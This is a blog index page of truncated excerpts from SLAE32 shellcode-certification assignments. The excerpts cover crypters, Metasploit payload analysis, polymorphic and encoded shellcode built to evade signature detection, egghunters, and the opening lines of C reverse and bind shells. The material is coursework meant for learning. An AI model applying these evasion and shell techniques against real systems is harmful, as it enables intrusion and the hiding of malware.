Bad at Security

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:  https://www.pentesteracademy.com/course?id=3 Student ID: PA-15072 All associated code can be found here:  https://github.com/pAP3R/public/tree/master/SLAE32/assignments Crypters For this assignment, students are tasked with creating a custom shellcode crypter. Requirements: Create a custom crypter like the one shown in the "crypters" video Free to use any existing encryption schema Can use any programming language Task 7 was... interesting. By far the most time spent headbanging (to metal and against metal), while also sporting the biggest facepalm. My original plan did end up being the outcome, although it took a detour and ended up at the same result. For this task I decided to go the AES CBC route-- it's a common and easily implemented encryption scheme. Using this article , I was able to come up with a PoC encryption / decr

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:  https://www.pentesteracademy.com/course?id=3 Student ID: PA-15072 All associated code can be found here:  https://github.com/pAP3R/public/tree/master/SLAE32/assignments Shellcode Analysis This task requests students to disassemble and analyze at least three shellcode samples created by metasploit, specifically those under the linux/x86 families. At the time of course creation, the tools msfpayload, msfencode etc had not yet been combined into msfvenom, which is what I'll obviously use. Requirements: Take up at least 3 shellcode samples created using Msfpayload for linux/x86 Use GDB/Ndisasm/Libemu to dissect the functionality of the shellcode Present your analysis I decided to perform analysis on the following three payloads: shell_reverse_tcp (a non-staged reverse shell) shell_bind_tcp (a non-staged bind shell) adduser (a payload for adding

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:  https://www.pentesteracademy.com/course?id=3 Student ID: PA-15072 All associated code can be found here:  https://github.com/pAP3R/public/tree/master/SLAE32/assignments Polymorphic Shellcodes Assignment 6 required students to take three shellcodes from shellstorm and create polymorphic versions of them. Requirements: Take up 3 shellcodes from Shell-Storm and create polymorphic versions of them to beat pattern matching The polymorphic versions cannot be larger 150% of the existing shellcode Shellcode 1: The first shellcode I chose for this assignment was a shellcode which adds a value to an /etc/hosts file, available here .  I like the idea here, as it's a little out of the normal shellcode tactic. It's not 'covert' but it certainly isn't just spawning /bin/bash :shrug The original shellcode is 77 bytes, so it's not huge

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:  https://www.pentesteracademy.com/course?id=3 Student ID: PA-15072 All associated code can be found here:  https://github.com/pAP3R/public/tree/master/SLAE32/assignments Encoders For this assignment, students were tasked with creating a custom encoding scheme, such as the "Insertion Encoder" from the course. Requirements: Create a custom encoding scheme like the “Insertion Encoder” Write a PoC using execve-stack as the shellcode to encode with your schema and execute Pretty simple! For this task, I decided to start with a simple ROT cipher as we're simply trying to avoid signature based detections. In python, that might look like this: >>> input = 1 >>> rotate = 13 >>> out = input + rotate >>> print(out) 14 That's pretty... expected, haha. Translated to asm, that's still very simple and

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:  https://www.pentesteracademy.com/course?id=3 Student ID: PA-15072 All associated code can be found here:  https://github.com/pAP3R/public/tree/master/SLAE32/assignments Egghunters! Woooo! I love egghunters, I think they're super cool. There's a lot of information out there on the web about egghunters, and some really good papers too (e.g. Skape). If you're totally unfamiliar and just want the tldr, here's the gist of it: Let's say you are testing some sort of server application, maybe it's an FTP app. The application has a couple different commands that accept some input, but when you send certain data to one of the commands, the application crashes in a way that allows you to control the flow of execution. "Hooray!" you might be thinking, "Now I can send my payload!" To your dismay, after sending payload aft

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:  https://www.pentesteracademy.com/course?id=3 Student ID: PA-15072 All associated code can be found here:  https://github.com/pAP3R/public/tree/master/SLAE32/assignments TCP_Reverse Shell Requirements: Connects to configured IP and port Execs shell on successful connection IP and port should be 'easily' configurable As with the TCP Bind shell from assignment one, I decided the best bet was to write out a reverse shell in C. There's a million resources out there, and the code I came up with is as follows: /* C reverse shell for SLAE */                     #include <unistd .h=""> #include <netinet in.h=""> #include <sys socket.h=""> #include <sys types.h=""> #define rhost "127.0.0.1" #define rport "4444"  int main(int argc, char *argv[])               

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:  https://www.pentesteracademy.com/course?id=3 Student ID: PA-15072 All associated code can be found here:  https://github.com/pAP3R/public/tree/master/SLAE32/assignments TCP_Bind Shell Requirements: Binds to a port Executes a shell on incoming connection Port should be 'easily' configurable For this assignment, I started like many others and first disassembled metasploit shellcode. It had the basic principals I expected, but to my dismay it didn't really help me to write my own-- MSF's shellcodes are well optimized, so I felt like I'd basically just be copying code, rather than learning to implement it myself. I decided to first write a bind shell in C, as it's low level and I'd be (essentially) making the same calls: // Shell_bind_tcp // For SLAE32 // Howard McGreehan #include <sys/socket.h> #include <unistd.h&g